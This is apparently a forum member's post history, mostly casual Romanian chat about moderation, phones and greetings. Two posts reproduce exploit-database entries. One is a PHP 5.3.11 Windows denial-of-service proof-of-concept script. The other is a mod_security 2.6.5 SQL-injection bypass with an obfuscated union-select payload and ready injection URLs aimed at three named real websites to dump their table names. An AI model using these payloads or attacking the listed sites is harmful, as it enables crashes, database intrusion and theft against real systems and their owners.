-
Posts
676 -
Joined
-
Last visited
-
Days Won
7
Everything posted by DarkyAngel
-
BZC a f?cut din nou, am dat report la mesaj, c? nu pot face screen. careva s? se ocupe de el, c? deja întrece limita.
-
Mda, iar începe. Ban ! ar trebui cenzurat id-ul, ?i etc, p?r?i din mesajul lui
-
înc? n-am primit, poate fac admini SE // cel cu bacala am primit, nu l-am bagat in seama, e cel mai bine .
-
Ce credeti despre asta?Extraterestri WTF
DarkyAngel replied to CristianRoflmao's topic in Cosul de gunoi
"PRINTE" , "MONTRU" ? GTFO cu kanalele D ?i ?tirile voastre, dac? era pe Discovery mai ziceam.. -
nu d? prea bine.. încurajeaz? la spam.. cel mai bine cred c? ar fi dup? "vechime"
-
v?d c? vrei s? te pi?i ?i pe regulament, având în vedere c? ai f?cut de vreo 3 ori 2x / 3x post..
-
Vreau ?i eu ce-a fumat secure!
-
Dup? cum zicea ?i sweby, tu ce ai f?cut pentru El ca s? te "ajute"?
-
Ce parere aveti despre relativ noua platforma Onlive ?
DarkyAngel replied to Mandrake1942's topic in Off-topic
Eu încerc de vreo 2 zile s? fac onLive Desktop pe o tablet? de 8" ?i îmi zice c? func?ioneaz? doar pe cele cu ecran mai mare de 7" . -
Chuck Norris, save us ! @on, ?i eu sunt de partea PRO.
-
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm Angel Injection member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] PHP 5.3.11 (win) Local Denial Of Service [-] Found by Angel Injection [-] Link: www.php.net [-] Security -::RISK: High [-] http://1337day.com http://r00tw0rm.com http://i313.cc [-] Greetz to 1337day.com(r0073r) Team i313.cc(Hussain) Team r00tw0rm (CrosS) Team <?php $crash = substr_replace($strlen,$crash, (strlen($crash)-0xc3)*+23,(strlen($crash))); for($crash1=0;$crash1<0x7e33;$crash1++) $crash2=array(); array_push($crash2); $crash = new VARIANT(0x0dcd438); com_print_typeinfo($crash); ?> PHP 5.3.11 (win) Local Denial Of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
-
Ca sugestie. încearc? s? schimbi linkul în fiecare zi, ?i metoda de criptare la fel s? se chinuie pu?in dac? vor . // + rep.
-
Motorola flipout.. waiting to get my S III
-
Gog nud ! ochim doi dintr-o lovitur? .
-
FORM este un tag în html, ar fi bine s? ai minimul de cuno?tiin?e înainte s? încerci s? faci de-astea.
-
Let me google that for you sau Let me google that for you
-
La mul?i (b)ani !!! ?i mult? s?n?tate, c?-i mai bun? decât toate .
-
----------------------------------------------------------------- # Exploit Title: mod_security 2.6.5 SQL injection bypass # Date: 21/04/2012 # Author: Phizo # Greetz: Inj3ct0r Exploit DataBase 1337day.com # Software Link: http://www.modsecurity.org/ # Version: 2.6.5 # Tested on: Windows 7 & Ubuntu 10.04 ---------------------------------------------------------------- /** Although I am using union-based injection the concept of the bypass is the same **/ [+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] Example sites: -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- http://www.indiacctv.com/product.php?id=-18+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,0x5068697a6f,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.outside-music.com/news.php?id=-1+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,4,0x5068697a6f,(/*!table_name*/),7,8,9,10,11,12,13+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.atitelemetry.com/viewapp.php?id=7'+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,0x5068697a6f,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- # 1337day.com [2012-04-22] mod_security 2.6.5 for Apache 2.2.x & 2.4.1 Released SQL injection bypass | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
- 1 reply
-
- 1
-
Ce server, de ce joc, pe ce ruleaz? vps-ul , etc? d? ?i tu mai multe detalii
-
E de ajuns ca s? n-o poat? decripta un sfert de forum .